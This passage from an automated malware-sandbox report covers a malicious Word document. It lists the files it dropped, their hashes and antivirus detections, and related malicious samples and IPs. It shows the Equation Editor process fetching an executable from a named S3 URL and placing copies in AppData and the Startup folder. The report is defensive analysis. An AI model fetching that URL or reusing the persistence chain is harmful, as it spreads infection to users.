                                Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                • 3.134.106.170
                                0d69e4f6_by_Libranalysis.xlsGet hashmaliciousBrowse
                                • 99.83.154.118
                                d630fc19_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                • 52.219.40.51

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                C:\Users\user\AppData\Roaming\CTF loader_es.exePO5421-allignright.docGet hashmaliciousBrowse
                                  lsqtIv1jRK.exeGet hashmaliciousBrowse
                                    04052021paymentscancopy.docGet hashmaliciousBrowse
                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exePO5421-allignright.docGet hashmaliciousBrowse
                                        lsqtIv1jRK.exeGet hashmaliciousBrowse
                                          04052021paymentscancopy.docGet hashmaliciousBrowse
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exePO5421-allignright.docGet hashmaliciousBrowse
                                              lsqtIv1jRK.exeGet hashmaliciousBrowse
                                                04052021paymentscancopy.docGet hashmaliciousBrowse

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:downloaded
                                                  Size (bytes):3367424
                                                  Entropy (8bit):2.545995908897728
                                                  Encrypted:false
                                                  SSDEEP:6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
                                                  MD5:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  SHA1:E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
                                                  SHA-256:FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
                                                  SHA-512:08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Virustotal, Detection: 41%, Browse
                                                  • Antivirus: Metadefender, Detection: 19%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Joe Sandbox View:
                                                  • Filename: PO5421-allignright.doc, Detection: malicious, Browse
                                                  • Filename: lsqtIv1jRK.exe, Detection: malicious, Browse
                                                  • Filename: 04052021paymentscancopy.doc, Detection: malicious, Browse
                                                  IE Cache URL:http://miolouno.s3-us-west-2.amazonaws.com/mad.exe
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..........."...0..X3..........v3.. ....3...@.. ........................3...........@..................................u3.O.....3.......................3...................................................... ............... ..H............text...4V3.. ...X3................. ..`.rsrc.........3......Z3.............@..@.reloc........3......`3.............@..B.................v3.....H........$...P3.........8$...............................................*".(.....*^..}.....(.......(.....*&.(......*".......*".(#....*Vs....($...t.........*....0................s......o.....*.0..~.............s.....s.....r...po.................o...........,.+...X.....+.........%.. .o.........+I..........o...........,.+)..r.83p(........,.+.....o....(....o.........X.......i2..o.............r.83p.r.83p(...........(..........%.r.83p.%.r.83p.%.r.83p.(...........(....r.83p.r.83p(.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{08186652-BACB-4000-A55F-0BCBA7498F21}.tmp
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1536
                                                  Entropy (8bit):1.3539040104691664
                                                  Encrypted:false
                                                  SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbg:IiiiiiiiiifdLloZQc8++lsJe1Mzv
                                                  MD5:F6F80D0BE464ED6C743C599B4F12385A
                                                  SHA1:0CF4030CC325956908EFA90CD1373A2868568127
                                                  SHA-256:520A9042C743B61A0779F861EE3834C35F05788DE16B75553B783CF806ACF8EB
                                                  SHA-512:F53D7E037981669FB252F430393AC3AD3377F918969FF92DDBC89B6C5910C6000D3FEEF2F21D2DCBBB6D4ADB2D3B340FE3783F1A58C47CC86E8B3DB021C68878
                                                  Malicious:false
                                                  Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{784A4D1B-DE8E-4300-98F0-AE5841A8170E}.tmp
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.05390218305374581
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lYdn:4Wn
                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                  Malicious:false
                                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9A867ADF-3614-4635-BF44-6C9AC8D8FC42}.tmp
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):163588
                                                  Entropy (8bit):3.745470873702184
                                                  Encrypted:false
                                                  SSDEEP:3072:+aAP+8FK1tm7YjkaipdiykZDCMbo0niY+uuDQKDCT:+FP+8miY4XLkdCP99QKGT
                                                  MD5:22FA8C878B114CA89FCABF13B0A044A3
                                                  SHA1:B449173A1CF65240EE376FC7638E3DEFD60C756A
                                                  SHA-256:D5D2CC035B4B850137BCE5E195357E5979FA3BF0FDFC57BFB925A07DF8A0DA26
                                                  SHA-512:AB02781F60B00CAC23800F49C5AF1FAD2298CFF01FE79B22C5F5F9E3FC723BEB9B96A1232A1A7001E1E81437E4A7938AA137EB6E62B5F1EBBBE8D7CB42F1CB61
                                                  Malicious:false
                                                  Preview: . . . . . . . . . . . . .9.0.1.5.3.3.8.1. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ._. .:. . . . . . . . . . . . . . . . . .p.4.z.A.3.c.v.t.T.o.F.T.I.n.3.v.Z.J.l.I.D.N.p.Y.M.O.f.k.y.J.s.M.b.H.i.z.X.F.k.E._.X.b.i.e.W.d.2.k.J.A.y.b.3.L.Q.Z.N.u.T.V.a.O.l.U.I.d.C.u.5.P.m.p.a.M.l.Y.i.L.2.R.C.g. .2.0.9.6.5.5.1.2.2.0.9.6.5.5.1.2...f.H.v.W.c.h.j.b.Q.T.e.k.S.t.h.O.n.d.B.x.W.g.r.o.S.v.C.L.J.P.g.d.D.F.F.f.l.y.K.Z.q.o.q.s.X.x.J.L.E.A.V.k.c.N.D.o.T.r.N.a.W.D.m.y.j.o.U.m.Q.O.y.y.B.N.z.T.h.C.x.n.w.J.r.b.h.H.m.i.x.U.t.s.r.f.o.r.H.K.k.E.Y.H.V.l.f.t.B.e.D.j.S.i.w.G.M.l.v.r.O.M.l.e.q.Z.d.X.H.x.E.V.v.x.S.D.u.d.L.i.r.m.t.T.p.k.m.s.Z.d.Y.s.D.O.R.X.y.m.n.H.N.F.K.W.x.f.H.d.r.N.a.g.Q.G.M.j.j.i.B.U.b.R.Z.m.b.d.Y.C.M.r.e.K.a.E.E.O.l.Q.x.K.i.e.I.q.T.B.Q.G.V.R.X.q.N.Q.H.B.C.u.o.S.d.F.K.I.Q.h.X.A.G.U.y.a.n.R.p.O.v.m.M.M.U.Z.i.G.c.p.d.L.D.A.v.X.p.q.m.c.D.e.w.h.C.E.R.z.c.O.E.A.r.a.K.b.B.w.Q.R.S.C.v.t.y.l.b.R.u.M.T.u.K.k.J.K.W.k.L.K.V.K.k.D.D.h.Q.d.m.U.D.a.c.S.S.a.I.p.P.D.m.i.O.m.E.m.s.m.I.a.n.h.o.u.O.
                                                  C:\Users\user\AppData\Local\Temp\1048825.cvr
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):1576
                                                  Entropy (8bit):3.4417743183760896
                                                  Encrypted:false
                                                  SSDEEP:48:LAll/H56+Rpjx4KHtKFlnL99+xxxWRb0Ga2KO93/cwm6:LA//Z6+7is4L99+xxxmYGn/m6
                                                  MD5:3E4F2F6075550D074C558371CC9CC9BD
                                                  SHA1:016C582ED7753219CF8EB9B32DEFC0414D600A62
                                                  SHA-256:E751A1D686FD0F3A015350A5CDFD234A666CA7FD8A198CD4ACA11A7E32A0062D
                                                  SHA-512:3489647347CACB06C9D3B2B34FD8D8C38E77EB2AA374DFE0E4F9F0865A67FA14C365245428E517DFBA9C2DDA8BF81B1CB5DC902190FC56ADAEB6AFD078AA3AF1
                                                  Malicious:false
                                                  Preview: MSQMx..........................g........................G.._A..k..3_A...............................................................................5......WINW........................................5...g.......;...........<...........A...........l...........................................c+..........`...........c+..N.......v...................................................................................8...S.......],..N...........<.......i*..B...........C...........F...........I.......N............+..H........+......................@...........@...........@...........@...+...........0...........:...........;....................4.......................,..........]...........]...m ..)....1..n"..........7#..........?...........................:*...,...........+..I........+..........@...........c...2kqa........................................8...$...........N...rrl7........rrl7........rrl7....8...rrl7....8...rrl7....8...rrl7........rrl7........rrl7....Q...rrl7....Q...rrl7....Q...rrl7
                                                  C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3367424
                                                  Entropy (8bit):2.545995908897728
                                                  Encrypted:false
                                                  SSDEEP:6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
                                                  MD5:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  SHA1:E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
                                                  SHA-256:FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
                                                  SHA-512:08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Virustotal, Detection: 41%, Browse
                                                  • Antivirus: Metadefender, Detection: 19%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Joe Sandbox View:
                                                  • Filename: PO5421-allignright.doc, Detection: malicious, Browse
                                                  • Filename: lsqtIv1jRK.exe, Detection: malicious, Browse
                                                  • Filename: 04052021paymentscancopy.doc, Detection: malicious, Browse
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..........."...0..X3..........v3.. ....3...@.. ........................3...........@..................................u3.O.....3.......................3...................................................... ............... ..H............text...4V3.. ...X3................. ..`.rsrc.........3......Z3.............@..@.reloc........3......`3.............@..B.................v3.....H........$...P3.........8$...............................................*".(.....*^..}.....(.......(.....*&.(......*".......*".(#....*Vs....($...t.........*....0................s......o.....*.0..~.............s.....s.....r...po.................o...........,.+...X.....+.........%.. .o.........+I..........o...........,.+)..r.83p(........,.+.....o....(....o.........X.......i2..o.............r.83p.r.83p(...........(..........%.r.83p.%.r.83p.%.r.83p.(...........(....r.83p.r.83p(.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Allignright_companyprofile.LNK
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Wed May 5 02:30:36 2021, length=2960089, window=hide
                                                  Category:dropped
                                                  Size (bytes):2188
                                                  Entropy (8bit):4.590602032190979
                                                  Encrypted:false
                                                  SSDEEP:48:8o/XTFGq79iDn1sQh2o/XTFGq79iDn1sQ/:8o/XJGq7wn1sQh2o/XJGq7wn1sQ/
                                                  MD5:5BBBD72D10C21586DEE0CAD09ADD2B8D
                                                  SHA1:0760C3EB44A74A4F750A6C424CB4D8A04CD9EE9E
                                                  SHA-256:5A5F1A263529163165FC2CBD84E9B4548FBF329A5422EBE9EF1FC6AFC5DE4504
                                                  SHA-512:A2024E2E338C1B239C2ECB5B360246DF703C305F3F0B66C871796076079D6FAADBCEF1B3AEF04C0DDB0EE3F05126C11A78096B82170E5D0C3B08E82B4AF7DDE3
                                                  Malicious:false
                                                  Preview: L..................F.... ...T.S..{..T.S..{..0Cy._A...*-..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..*-..R.. .ALLIGN~1.DOC..j.......Q.y.Q.y*...8.....................A.l.l.i.g.n.r.i.g.h.t._.c.o.m.p.a.n.y.p.r.o.f.i.l.e...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\284992\Users.user\Desktop\Allignright_companyprofile.doc.5.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.l.l.i.g.n.r.i.g.h.t._.c.o.m.p.a.n.y.p.r.o.f.i.l.e...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.....
                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):116
                                                  Entropy (8bit):4.657550098584195
                                                  Encrypted:false
                                                  SSDEEP:3:M1tybVKxAl8JJjbVKxAlmX1tybVKxAlv:MTyExAGVExA0yExA1
                                                  MD5:FA26198640628CEC6D776D7BB8A4A7EB
                                                  SHA1:080BF5E7446190648986780F4D9E666D74087362
                                                  SHA-256:A3B64602BA15FFB5E8DC508D21A6BEFB4BDBBEDD8CA5014794C05002FA8023EF
                                                  SHA-512:8B3C10ABFF4F2050A7CB86542F856DB4CEF253D79BDA0301F5608519742E5C8292A4216CC58D8383AF54C716E6E7C07F5DC12B45E4F9ABB2D34501748AAFC3D5
                                                  Malicious:false
                                                  Preview: [doc]..Allignright_companyprofile.LNK=0..Allignright_companyprofile.LNK=0..[doc]..Allignright_companyprofile.LNK=0..
                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.431160061181642
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                  MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                  SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                  SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                  SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                  Malicious:false
                                                  Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):2
                                                  Entropy (8bit):1.0
                                                  Encrypted:false
                                                  SSDEEP:3:Qn:Qn
                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                  Malicious:false
                                                  Preview: ..
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0B643QLK5ZML9R9E3HST.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\14LJSV38HUMSQNNUJ4FI.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4YKYB2VKZ9SALOEP6IHD.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\83F00AO61JO8JVBNZZNG.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\87BC13303IWXGUS4CPWO.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AX9LQTWXBI1OLIGT87K1.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
